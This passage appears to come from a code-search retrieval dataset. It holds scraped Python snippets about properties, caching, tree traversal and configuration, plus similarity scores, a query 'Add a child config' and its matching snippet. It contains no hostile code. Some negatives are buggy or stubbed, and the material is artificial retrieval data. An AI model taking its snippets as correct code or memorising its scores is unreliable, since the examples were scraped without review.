\\\n or self.__dict__[attr_name] != value:\n self.__dict__[attr_name] = value\n self.is_modified = True\n\n return property(get, set)", "def cached_property(expensive_function):\n @property\n def caching_function(self):\n cacheName = f\"__cache__{expensive_function.__name__}\"\n \n\t\t\n try: # check if the cache has been initialized\n cacheExists = True\n cache = getattr(self, cacheName)\n except AttributeError:\n cacheExists = False\n cache = None\n \n\t\t# Check if the cache is valid (not None), caching is requested, and that it exists\n if ( cache is not None ) and ( self.withCaching == True ) and (cacheExists == True):\n return cache\n else:\n\t\t\t#worst case, now we have to compute the quantity\n computed = expensive_function(self)\n setattr(self, cacheName, computed)\n return computed\n \n return caching_function", "def getProperty(propname):", "def cached_property(fun):\n @functools.wraps(fun)\n def get(self):\n try:\n return self._cache[fun]\n except AttributeError:\n self._cache = {}\n except KeyError:\n pass\n ret = self._cache[fun] = fun(self)\n return ret\n return property(get)", "def test_properties_get(self):\n pass", "def auto_property_list(self, prop_reader_cls, offset_addr, n_offsets, n_items_per_sub_list=0, sub_list_prefix=''):\n prop_reader = prop_reader_cls()\n use_sub_lists = n_items_per_sub_list > 0\n prop_list = {}\n\n # If we don't have sub lists in the property list, just use the main prop_list as the current sub list\n if use_sub_lists:\n sub_list = None\n n_sub_lists = (n_offsets - 1) // n_items_per_sub_list\n else:\n sub_list = prop_list\n n_sub_lists = 1\n\n # Initialize read\n data_addr = offset_addr + n_offsets * 4\n offset = self.uint32()\n\n for prop_id in range(n_offsets - 1):\n # Maybe update sub list\n if use_sub_lists:\n sub_list_id = prop_id // n_sub_lists\n prop_id = prop_id % n_sub_lists\n\n if prop_id == 0:\n prop_list[f'{sub_list_prefix}{sub_list_id}'] = sub_list = {}\n\n # Read the property\n next_offset = self.uint32()\n with self.offset_context(data_addr + offset):\n data = prop_reader.read(prop_id, self, next_offset - offset)\n sub_list.update(data)\n\n offset = next_offset\n\n # Set the pointer after the data\n self.seek(data_addr + offset)\n\n return prop_list", "def iterProperties(cls):\n meta = cls.staticMetaObject\n for i in range(meta.propertyCount()):\n yield meta.property(i).name()", "def getParentProperty(self, propertyName):\n return [getattr(fp, propertyName) for dp in self.deblendedParents]", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def property_autoparse(self, candidate_pattern, patterns):\n properties = None\n candidates = self.find_objects(regex=candidate_pattern)\n if len(candidates):\n properties = []\n else:\n return properties\n for candidate in candidates:\n properties.append(self.match_to_dict(line=candidate, patterns=patterns))\n return properties", "def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)", "def _cache_property_methods(self, name):\n if name.endswith(\"_\"):\n # If the requested name ends with _, that's a marker that we're\n # dealing with a method call, not a property, so we can shortcut\n # the process.\n methods = None\n else:\n # Check 1: Does the class respond to the property?\n responds = libobjc.class_getProperty(self, name.encode(\"utf-8\"))\n\n # Check 2: Does the class have an instance method to retrieve the given name\n accessor = self._cache_method(name)\n\n # Check 3: Is there a setName: method to set the property with the given name\n mutator = self._cache_method(\"set\" + name[0].title() + name[1:] + \":\")\n\n # Check 4: Is this a forced property on this class or a superclass?\n forced = False\n superclass = self\n while superclass is not None:\n if name in superclass.forced_properties:\n forced = True\n break\n superclass = superclass.superclass\n\n # If the class responds as a property, or it has both an accessor *and*\n # and mutator, then treat it as a property in Python.\n if responds or (accessor and mutator) or forced:\n methods = (accessor, mutator)\n else:\n methods = None\n return methods", "def __getitem__(self, key):\n key_split = key.split('.')\n last_index = len(key_split) - 1\n current = self\n for i, k in enumerate(key_split):\n try:\n current = getattr(current, k)\n except KeyError:\n if i == last_index:\n raise\n temp_dict = DotDictWithAcquisition()\n temp_dict.__dict__['_parent'] = weakref.proxy(current)\n current = temp_dict\n return current", "def get_properties():", "def test_dotted_named_entities_circular_references():\n from tests.dottedname.foo.bar.bop import Property\n\n p = Property(\n name='outer',\n nested={\n 'properties': [\n Property(name='inner')\n ]\n }\n )\n assert p\n assert isinstance(p.nested.properties, list)\n assert p.nested.properties[0].name == 'inner'", "def properties_owns(cls, *args):\n return cls.graph_traversal(\n None, None, Bytecode()).properties_owns(*args)", "def is_lazy(self) -> bool:\n return self._is_lazy", "def __iter__(self):\n element = self\n\n while element.HasField(\"pathtype\"):\n yield element\n\n if element.HasField(\"nested_path\"):\n element = element.nested_path\n else:\n break", "def get(obj, path):\n right = path\n cur = obj\n while right:\n left, right = partition(right)\n if isinstance(cur, dict):\n cur = cur.get(left)\n elif isinstance(cur, (list, tuple)):\n left = int(left)\n cur = cur[left] if left < len(cur) else None\n return cur", "def __iter__(self):\n n = self.getRoot()\n while n.left is not None:\n n = n.left\n while True:\n yield n.value\n n = n._successor()\n if n is None:\n break", "def __call__(self, arg):\n return self.get_property(arg)", "def max_recursion_depth(self) -> ConfigNodePropertyInteger:\n return self._max_recursion_depth", "def memoized_property(method):\n\n method_name = method.__name__\n attr_name = \"_\" + method_name\n undefined = object()\n\n def wrapped(self):\n attr = getattr(self, attr_name, undefined)\n if attr is undefined:\n attr = method(self)\n setattr(self, attr_name, attr)\n return attr\n\n wrapped = property(wrapped)\n return wrapped", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def __iter__(self):\n\n if not self.left and not self.right:\n raise StopIteration\n return self.children().__iter__()\n\n # def SP_traverse(self):\n \"\"\" Return a string of series-parallel partial order.\n\n A recursion way to implement in-order traversal.\n\n return\n -------\n A simple formula of series-parallel partial order\n\n \"\"\"\n # if self.left != None and self.right == None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data)\n #\n # if self.right != None and self.left == None:\n # return str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left != None and self.right != None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left == None and self.right == None:\n # return str(self.data)", "def _evaluate(prop_name, prop_value, binary_info):\n\n def compatible_prop(setting_value, _prop_value):\n return (_prop_value == setting_value) or (_prop_value == \"None\" and setting_value is None)\n\n # TODO: Necessary to generalize this query evaluation to include all possible fields\n info_settings = binary_info.get(\"settings\", {})\n info_options = binary_info.get(\"options\", {})\n\n if not prop_name.startswith(\"options.\"):\n return compatible_prop(info_settings.get(prop_name), prop_value)\n else:\n prop_name = prop_name[len(\"options.\"):]\n return compatible_prop(info_options.get(prop_name), prop_value)", "def get_next(self):\n\n pos_options = []\n kw_options = {}\n for opt in self.pos_options:\n if isinstance(opt, LazyObject):\n pos_options.append(opt.get_current())\n elif isinstance(opt, LazyExpression):\n pos_options.append(opt.eval())\n else:\n pos_options.append(opt)\n\n for opt_k, opt_v in self.kw_options.items():\n if isinstance(opt_v, LazyObject):\n kw_options[opt_k] = opt.get_current()\n elif isinstance(opt_v, LazyExpression):\n kw_options[opt_k] = opt_v.eval()\n else:\n kw_options[opt_k] = opt_v\n\n self.current_obj = self.cls(*pos_options, **kw_options)\n return self.current_obj", "def callPropertyGet(self, name = \"__value\", index = None):\n\t\tif name == 'IID':\n\t\t\treturn CSLValue(typeid = \"string\", value = self.callerInfo.IID)\n\t\tEntry = self.vtbl['p_' + name + \"_get\"]\n\t\t#localTbl = { 'vars':{}, 'status':0, 'props':{}, 'alias':{}, 'persistent':{}, 'instance':{}}\n\t\tpropEntry = Entry.parent\n\t\tprmName = propEntry.data['prm']\n\t\tlocalTbl = self.CSLCreateLocalTbl({}, {}, {}, copy.copy(propEntry.data['persistent']), copy.copy(propEntry.data['instance']))\n\t\tif prmName != \"\":\n\t\t\tif index == None:\n\t\t\t\tdefault = propEntry.data['default']\n\t\t\t\tif default != \"\":\n\t\t\t\t\tdefault = self.CSLCheckValue(default, localTbl)\n\t\t\t\telse:\n\t\t\t\t\tdefault = CSLValue(typeid = \"NULL\", value = None)\n\t\t\telse:\n\t\t\t\tdefault = index\n\n\t\t\tlocalTbl['vars'][prmName] = default\n\n\t\tself.procStack.append('p_' + name + '_get')\n\t\tself.lastLTbl = self.CSLInterpreter(Entry.child, localTbl)\n\t\tself.procStack.pop()\n\t\tl = self.lastLTbl['vars']\n\n\t\tself.debug(DEBUG_CALL, \"\\n\\nGetProp result: (\", name, \")\", l, \"haskey:\", l.has_key(name))\n\n\t\tif l != None and l.has_key(name):\n\t\t\tself.debug(DEBUG_CALL, \"Get Property return:\", l[name])\n\t\t\treturn copy.deepcopy(l[name])\n\t\telse:\n\t\t\treturn CSLValue(typeid = \"NULL\", value = None)", "def test_cached_property():\n new_value = \"99999\"\n\n class DummyClass:\n def __init__(self):\n self.value = \"11111\"\n\n def change_value_in_instance(self, value):\n self.value = value\n\n @cached_property\n def test_property(self):\n return self.value\n\n @property\n def test_uncached_property(self):\n return self.value\n\n testClass = DummyClass()\n first_cached_test_property = testClass.test_property\n first_uncached_test_property = testClass.test_uncached_property\n testClass.change_value_in_instance(new_value)\n second_cached_test_property = testClass.test_property\n second_uncached_test_property = testClass.test_uncached_property\n\n assert first_cached_test_property == second_cached_test_property\n assert first_cached_test_property == \"11111\"\n\n assert first_uncached_test_property != second_uncached_test_property\n assert first_uncached_test_property == \"11111\"\n assert second_uncached_test_property == \"99999\"", "def process_property(self, resources, resource, model, prop, context):\n pass", "def lazy(func):\n\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n name = \"_\" + func.__name__\n try:\n return getattr(self, name)\n except AttributeError:\n value = func(self, *args, **kwargs)\n setattr(self, name, value)\n return value\n\n return wrapper", "def Property(\tsubspaceFunction = lambda instance: instance.sharedStateSubspace,\n default = lambda: None,\n exposeToProtocol = False\n ):\n def propertyListGenerator(name, cls):\n \"\"\"Generates a list of (name, ComputedGraph.Property) objects corresponding to\n this property object.\"\"\"\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]\n\n return ComputedGraph.PropertyMaker(propertyListGenerator, exposeToProtocol)", "def __get__(self,obj,objtype):\n gen = super(Dynamic,self).__get__(obj,objtype)\n\n if not hasattr(gen,'_Dynamic_last'):\n return gen\n else:\n return self._produce_value(gen)", "def make_recursive_propdict(wcroot,\r\n output,\r\n rex = re.compile(\"Properties on '(.*)':\")):\r\n lines = filter(None, output.split('\\n'))\r\n pdict = {}\r\n while lines:\r\n line = lines.pop(0)\r\n m = rex.match(line)\r\n if not m:\r\n raise ValueError, \"could not parse propget-line: %r\" % line\r\n path = m.groups()[0]\r\n wcpath = wcroot.join(path, abs=1)\r\n propnames = []\r\n while lines and lines[0].startswith(' '):\r\n propname = lines.pop(0).strip()\r\n propnames.append(propname)\r\n assert propnames, \"must have found properties!\"\r\n pdict[wcpath] = svncommon.PropListDict(wcpath, propnames)\r\n return pdict", "def _compute_invalidation_scope_recursive(request, result, meta, source_type, target_type, simulated_prop):\n if 'calculatedProperty' in meta: # we cannot patch calc props, so behavior here is irrelevant\n return\n elif meta['type'] == 'object':\n if 'properties' not in meta:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n elif meta['type'] == 'array':\n sub_type = meta['items']['type']\n if sub_type == 'object':\n if 'properties' not in meta['items']:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['items']['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)", "def properties(self):", "def properties(self):", "def properties(self):", "def test_lazy_base_class(self):\n\n class Base(object):\n def base_method(self):\n pass\n\n class Klazz(Base):\n pass\n\n t = lazy(lambda: Klazz(), Klazz)()\n self.assertTrue('base_method' in dir(t))", "def deepget(self, key):\n if DEBUG: print(repr(self))\n if '.' in key:\n top, rest = key.split('.', 1)\n #if DEBUG: print(top, rest)\n return self[top].deepget(rest)\n else:\n return self[key]", "def get_properties(self):\n return self.properties", "def get_cached_property_names(self): # real signature unknown; restored from __doc__\n return []", "def property( self, prop ):\n raise NotImplementedError(\"property\")", "def prop(self, statement):\n return MinCut.prop(self._root, statement)", "def abstractproperty(func):\n if sys.version_info > (3, 3):\n return property(abc.abstractmethod(func))\n return abc.abstractproperty(func)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)", "def __iter__(self):\n if self.left is not None:\n yield from self.left\n yield self\n if self.right is not None:\n yield from self.right", "def get_property(self, property, data):\n\n values = data.xpath(\"%s//*[@%s='%s']\" % (self.scope, self.attribute, property))\n if len(values) == 0:\n values = data.xpath(\"//*[@%s='%s']\" % (self.attribute, property))\n return values", "def test_properties_evolution_get(self):\n pass", "def test_augassign_recursion():\n # infinitely recurses in python\n code = \"\"\"\n def rec():\n a = 0\n a += rec()\n return a\n rec()\n \"\"\"\n cls_node = extract_node(code)\n assert next(cls_node.infer()) is util.Uninferable", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def propertyx(function):\n keys = ('fget', 'fset', 'fdel')\n func_locals = {'doc': function.__doc__}\n\n def probe_func(frame, event, arg):\n if event == 'return':\n locals = frame.f_locals\n func_locals.update(dict((k, locals.get(k)) for k in keys))\n sys.settrace(None)\n return probe_func\n\n sys.settrace(probe_func)\n function()\n return property(**func_locals)", "async def _materialize_walk_obj(d) -> Tree:\n if isinstance(d, ViewModel):\n # Resolve the first level of awaitables\n edge_set = set(d.__visited_edges__)\n edges = await resolve_parallel_dict(d, edge_set)\n # Resolve all edges recursively\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in edges))\n for (k, _), val in zip(edges, vals):\n if k in edge_set:\n setattr(d, k, val)\n return d\n elif isinstance(d, dict):\n # Resolve the first level of awaitables\n items = await resolve_parallel_dict(d)\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in items))\n for (k, _), val in zip(items, vals):\n d[k] = val\n return d\n elif isinstance(d, primitive) or d is None:\n return d\n elif isinstance(d, PaginatedEdge):\n d.edges = await resolve_parallel_iterable(d.edges)\n return d\n elif isinstance(d, Iterable):\n resolved = await resolve_parallel_iterable(d)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif type(d) == types.AsyncGeneratorType:\n d_list = [i async for i in d] # TODO: Optimize\n resolved = await resolve_parallel_iterable(d_list)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif isawaitable(d) or callable(d):\n # TODO: Profile and optimize recursive call\n resolved = await async_resolve_field(d)\n return await _materialize_walk_obj(resolved)\n raise Exception(\"Invalid type: \" + str(type(d)))", "def run(self):\n # Look through the properties.\n for name, value in \\\n self.context.get_properties(self.path).items():\n\n # If the name doesn't match, skip this one.\n if self.nameregex \\\n and not self.nameregex.match(name): continue\n\n # If the value doesn't match, skip this one.\n if self.valueregex \\\n and not self.valueregex.search(value): continue\n\n # Execute the child actions.\n self.context.tokens['PropName'] = name\n self.context.tokens['PropValue'] = value\n exitcode = super(FilterPropList, self).run()\n\n # If only looking for the first, or an error is reported,\n # bail out early.\n if self.matchfirst or exitcode != 0: return exitcode\n\n # Handle a non-error exit.\n return 0", "def get_properties(\n self, props=None, depth=0, parse_response_xml=True, parse_props=True\n ):\n rc = None\n response = self._query_properties(props, depth)\n if not parse_response_xml:\n return response\n\n if not parse_props:\n properties = response.find_objects_and_props()\n else:\n properties = response.expand_simple_props(props)\n\n error.assert_(properties)\n\n path = unquote(self.url.path)\n if path.endswith(\"/\"):\n exchange_path = path[:-1]\n else:\n exchange_path = path + \"/\"\n\n if path in properties:\n rc = properties[path]\n elif exchange_path in properties:\n if not isinstance(self, Principal):\n ## Some caldav servers reports the URL for the current\n ## principal to end with / when doing a propfind for\n ## current-user-principal - I believe that's a bug,\n ## the principal is not a collection and should not\n ## end with /. (example in rfc5397 does not end with /).\n ## ... but it gets worse ... when doing a propfind on the\n ## principal, the href returned may be without the slash.\n ## Such inconsistency is clearly a bug.\n log.error(\n \"potential path handling problem with ending slashes. Path given: %s, path found: %s. %s\"\n % (path, exchange_path, error.ERR_FRAGMENT)\n )\n error._assert(False)\n rc = properties[exchange_path]\n elif self.url in properties:\n rc = properties[self.url]\n elif \"/principal/\" in properties and path.endswith(\"/principal/\"):\n ## Workaround for a known iCloud bug.\n ## The properties key is expected to be the same as the path.\n ## path is on the format /123456/principal/ but properties key is /principal/\n ## tests apparently passed post bc589093a34f0ed0ef489ad5e9cba048750c9837 and 3ee4e42e2fa8f78b71e5ffd1ef322e4007df7a60, even without this workaround\n ## TODO: should probably be investigated more.\n ## (observed also by others, ref https://github.com/python-caldav/caldav/issues/168)\n rc = properties[\"/principal/\"]\n elif \"//\" in path and path.replace(\"//\", \"/\") in properties:\n ## ref https://github.com/python-caldav/caldav/issues/302\n ## though, it would be nice to find the root cause,\n ## self.url should not contain double slashes in the first place\n rc = properties[path.replace(\"//\", \"/\")]\n elif len(properties) == 1:\n ## Ref https://github.com/python-caldav/caldav/issues/191 ...\n ## let's be pragmatic and just accept whatever the server is\n ## throwing at us. But we'll log an error anyway.\n log.error(\n \"Possibly the server has a path handling problem, possibly the URL configured is wrong.\\n\"\n \"Path expected: %s, path found: %s %s.\\n\"\n \"Continuing, probably everything will be fine\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n rc = list(properties.values())[0]\n else:\n log.error(\n \"Possibly the server has a path handling problem. Path expected: %s, paths found: %s %s\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n error.assert_(False)\n\n if parse_props:\n self.props.update(rc)\n return rc", "def isprop(v):\n return isinstance(v, property)", "def traverse(self, recursive=False):\n out = []\n for i in range(len(self.keys)):\n if recursive == True and self.refs[i] != None:\n out.extend(self.refs[i].traverse(recursive=True))\n out.append[self.values[i]]\n if recursive == True:\n out.extend(self.refs[i+1].traverse(recursive=True))\n return out", "def walk(obj,dict_fn):\n if isinstance(obj,dict):\n result = dict()\n for key, value in obj.items():\n result[key] = walk(value, dict_fn)\n return dict_fn(result)\n if isinstance(obj,list):\n return [walk(i,dict_fn) for i in obj]\n return obj", "def memoized(fget):\n attr_name = \"_{0}\".format(fget.__name__)\n\n @wraps(fget)\n def fget_memoized(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fget(self))\n return getattr(self, attr_name)\n\n return property(fget_memoized)", "def enable_lazy():\r\n global USE_LAZY\r\n USE_LAZY = True", "def computed_some_property(config):\n return config.something + 10", "def run_properties(self, expanded, unexpanded) :\n\t\treturn self.manage_view_properties(expanded, unexpanded, \"/manage_propertiesForm\", perms = \"Manage properties\")", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def descendant_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n descendants = nx.descendants(self.se.property_only_graph,\n self.uri)\n result = restructure_output(self,\n descendants,\n inspect.stack()[0][3],\n self.output_type)\n return result" ]
[ "0.6558812", "0.62286186", "0.6222235", "0.6111081", "0.6004813", "0.5979281", "0.5608828", "0.5590664", "0.5550107", "0.5419193", "0.53930444", "0.5368933", "0.5345204", "0.53392524", "0.5152866", "0.5152002", "0.514644", "0.5144571", "0.51304764", "0.5085058", "0.50584644", "0.50355273", "0.5026561", "0.5001398", "0.49765545", "0.49714968", "0.4971482", "0.49477386", "0.49209678", "0.490763", "0.49023068", "0.48982802", "0.48976934", "0.48913345", "0.4885671", "0.48856318", "0.4885494", "0.48834714", "0.4882764", "0.4881576", "0.4874346", "0.48715752", "0.48701447", "0.48674327", "0.4861834", "0.48573688", "0.4844952", "0.4840363", "0.48317963", "0.48042354", "0.47923332", "0.47892702", "0.47866815", "0.478347", "0.477919", "0.47621185", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47584453", "0.47549996", "0.4753754", "0.47429344", "0.47275168", "0.47251192", "0.4718781", "0.47182494", "0.47096625", "0.47081465", "0.4701575", "0.47010106", "0.47010106", "0.47010106", "0.47003993", "0.46998993", "0.46942866", "0.46929848", "0.46803796", "0.46797404", "0.46768996", "0.46720797", "0.46626878", "0.46619138", "0.46583843", "0.4655812", "0.4651831", "0.4647985", "0.46298546", "0.46284577", "0.46218485", "0.4619083", "0.46148524", "0.46133822", "0.4612502", "0.46103463", "0.4608182", "0.46080768", "0.4606708", "0.45809472" ]
0.0
-1
Add a child config
def add(self, key, child_config): self.__dict__[key] = child_config child_config.root = self
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_config(self, parent_node, child_value):\n edge_cost = self.cost(parent_node.value, child_value)\n child_node = Node(\n child_value,\n parent=parent_node,\n cost=parent_node.cost + edge_cost,\n depth=parent_node.depth + 1\n )\n parent_node.children.append(child_node)\n self.nodes.append(child_node)\n # self.tree = KDTree(np.vstack((self.tree.data, np.array([child_value[0], child_value[1]]))))\n coords = child_value[:2] # child_value only has 2 coords (x, y) right now, but it may have theta in the future.\n self.idx.insert(self.size, self.make_bounding_box(coords))\n self.size += 1\n \n return child_node", "def add_subconfig(self, name, arg_kws=None, func=None):\n if name in self.subconfig:\n raise ValueError(\"Subconfig '%s' is already defined.\" % name)\n if arg_kws is None:\n arg_kws = dict()\n argparser = self.subparsers.add_parser(name, **arg_kws)\n subconfig = SubConfig(argparser, self.config, name, func)\n self.subconfig[name] = subconfig\n return subconfig", "def inherit_config(child, parent, keys):\n for key in keys:\n if key not in child.keys():\n child[key] = parent[key]\n print(\n \"{} not found in io.yaml file, falling back to main config\".format(key)\n )\n\n return child", "def addChild(self, title, path, orig_cp):\n cp = L10nConfigParser(urljoin(self.baseurl, path), **self.defaults)\n cp.loadConfigs()\n self.children.append(cp)", "def new_child(self, prefix: str, root: Any = None, values: Dict[str, Any] = None) -> 'Config':\n config = Config(prefix, self)\n if root and prefix:\n config[prefix] = root\n if values:\n config.add_all(values)\n return config", "def add_child(self, node):\n\n\t\tif Defaults == node.__class__:\n\t\t\tself.__defaults = node\n\t\telif Variables == node.__class__:\n\t\t\tself.__variables = node\n\t\telif Servers == node.__class__:\n\t\t\tself.__servers = node\n\t\telif FileSets == node.__class__:\n\t\t\tself.__filesets = node\n\t\telif Targets == node.__class__:\n\t\t\tself.__targets = node\n\t\telse:\n\t\t\traise DepFileParsingError()\n\n\t\treturn True", "def add_child(self, child):\r\n self.children.append(child)", "def add_child(self, child):\r\n \r\n self._children.append(child)\r\n self.update_batch(self._batch, self._group)", "def add_child(self, child):\r\n self.children.append(child)", "def override(self, parent):\n return self.__class__(Cfg._mergedicts(self, parent, True))", "def add_child(self, child):\n self.children.append(child)", "def add_child(self, child):\n self.children.append(child)", "def add_child(self, child):\n self.childs.append(child)", "def add_child(self, text, alert_on_duplicate=False, idx=None, force_duplicate=False):\n\n if idx is None:\n idx = len(self.children)\n # if child does not exist\n if text not in self:\n new_item = HConfigChild(self, text)\n self.children.insert(idx, new_item)\n self.children_dict[text] = new_item\n return new_item\n # if child does exist and is allowed to be installed as a duplicate\n elif self._duplicate_child_allowed_check() or force_duplicate:\n new_item = HConfigChild(self, text)\n self.children.insert(idx, new_item)\n self.rebuild_children_dict()\n return new_item\n else:\n # If the child is already present and the parent does not allow\n # duplicate children, return the existing child\n # Ignore duplicate remarks in ACLs\n if alert_on_duplicate and not text.startswith('remark '):\n if self is self.root:\n path = [text]\n else:\n path = list(self.path()) + [text]\n self.logs.append(\"Found a duplicate section: {}\".format(path))\n return self.get_child('equals', text)", "def addChild( self, child ):\n\n self.childs.append( child )", "def appendChild(self, child):\n self.__initChild()\n self.__child.append(child)", "def add_child(self, child: UIComponent):\n child.parent = self\n child.set_chronometer(self._chronometer)\n self.children.append(child)\n if self.props.resize_mode == ResizeMode.AUTO:\n self._reset('add_child')", "def _newChild(self, child):\n self._testKeySubNsAdd()\n self._getSubNsList().append(child)", "def addChild(self, child):\n #assert child not in self.children\n #if child not in self.children:\n child.parents.append(self)\n self.children.append(child)", "def _init_child(self,child,path):\n pass", "def add_child(self, child, label):\n self.children[label] = child\n child.parents.append(self)", "def init_config(self):\n super().init_config()\n for param in self.parameters():\n if param.name == 'source':\n continue\n self.add_config_item(param.name,\n saver=lambda p=param: getattr(p, \"value\"),\n loader=lambda x, p=param: setattr(p, \"value\", x),\n default=param.default)", "def add_config_field(self, content_type, name, *args, **kwargs):\n if name == 'representation_args':\n raise ValueError('{} is a reserved Config field name'.format(name))\n self._add_config_arg(ConfigField, content_type, name, *args, **kwargs)", "def append_child(self, child):\n\t\tself._children.append(child)", "def add_child(self, child):\n name = child.name\n self._children[name] = child\n self._name_dict[name.split('-')[0]] += 1", "def create_subparser(self, parent, storage):\n p = parent.add_parser(\n 'inject-config',\n help=\"Inject a configuration file into an OVF package\",\n usage=self.UI.fill_usage(\"inject-config\", [\n \"PACKAGE -c CONFIG_FILE [-o OUTPUT]\",\n \"PACKAGE -s SECONDARY_CONFIG_FILE [-o OUTPUT]\",\n \"PACKAGE -c CONFIG_FILE -s SECONDARY_CONFIG_FILE [-o OUTPUT]\",\n ]),\n description=\"\"\"Add one or more \"bootstrap\" configuration \"\"\"\n \"\"\"file(s) to the given OVF or OVA.\"\"\")\n\n p.add_argument('-o', '--output',\n help=\"\"\"Name/path of new VM package to create \"\"\"\n \"\"\"instead of updating the existing package\"\"\")\n\n p.add_argument('-c', '--config-file',\n help=\"\"\"Primary configuration text file to embed\"\"\")\n p.add_argument('-s', '--secondary-config-file',\n help=\"\"\"Secondary configuration text file to embed \"\"\"\n \"\"\"(currently only supported in IOS XRv for \"\"\"\n \"\"\"admin config)\"\"\")\n p.add_argument('PACKAGE',\n help=\"\"\"Package, OVF descriptor or OVA file to edit\"\"\")\n p.set_defaults(instance=self)\n\n storage['inject-config'] = p", "def spawnWithConfig(self, config, here, there):\n raise NotImplementedError(\"subclasses must implement the specifics\")", "def add(ctx, option, value):\n properties = option.split(\".\")\n section = properties[0]\n option = properties[1]\n cfg = ctx.obj['cfg']\n if not cfg.has_section(section):\n cfg.add_section(section)\n cfg.set(section, option, value)\n with open(config_path(), 'w') as fp:\n cfg.write(fp)", "def add_child(self, child, probe_id=None):\n node = None\n matching_nodes = [x for x in self.children if x.name == child.name] # see if the added node has already in its children list\n # print(\"[*] add children with the name {}.. matching_nodes: {}\".format(child.name, matching_nodes))\n if len(matching_nodes) > 0:\n node = matching_nodes[0]\n if probe_id is not None:\n node.probes = probe_id\n # print(\"\\t[*] current node: {}\".format(node.name))\n if node is None:\n if probe_id is not None:\n child.probes = probe_id\n self.children.append(child)\n node = child\n # print(\"\\t[*] node {} is appended to {} child list\".format(node.name, self.name))\n return node", "def addConfiguration(self, d):\n self.__populateDict(self._configuration, d)", "def _configure_addon(self):\n cfg = None\n try:\n data_dir = os.path.split(self.props.data_dir)\n\n cfg = Configuration(jobtype='Blender', \n data_path=data_dir[0],\n log_level=int(self.props.log_level),\n name=self.props.ini_file,\n datadir=data_dir[1])\n \n except (InvalidConfigException, IndexError) as exp:\n self.log.warning(\"Warning failed to load config file, \"\n \"creating new default config.\")\n self.log.warning(str(exp))\n \n finally:\n\n if not os.path.isdir(self.props.data_dir):\n raise EnvironmentError(\"Data directory not created - \"\n \"please ensure you have adequate permissions.\")\n\n if not cfg:\n cfg = Configuration(jobtype='Blender', log_level='warning')\n\n if self.props.endpoint:\n cfg = override_config(cfg, endpoint=self.props.endpoint)\n if self.props.account:\n cfg = override_config(cfg, account=self.props.account)\n if self.props.key:\n cfg = override_config(cfg, key=self.props.key)\n if self.props.client_id:\n cfg = override_config(cfg, client_id=self.props.client_id)\n if self.props.tenant:\n cfg = override_config(cfg, tenant=self.props.tenant)\n if self.props.redirect:\n cfg = 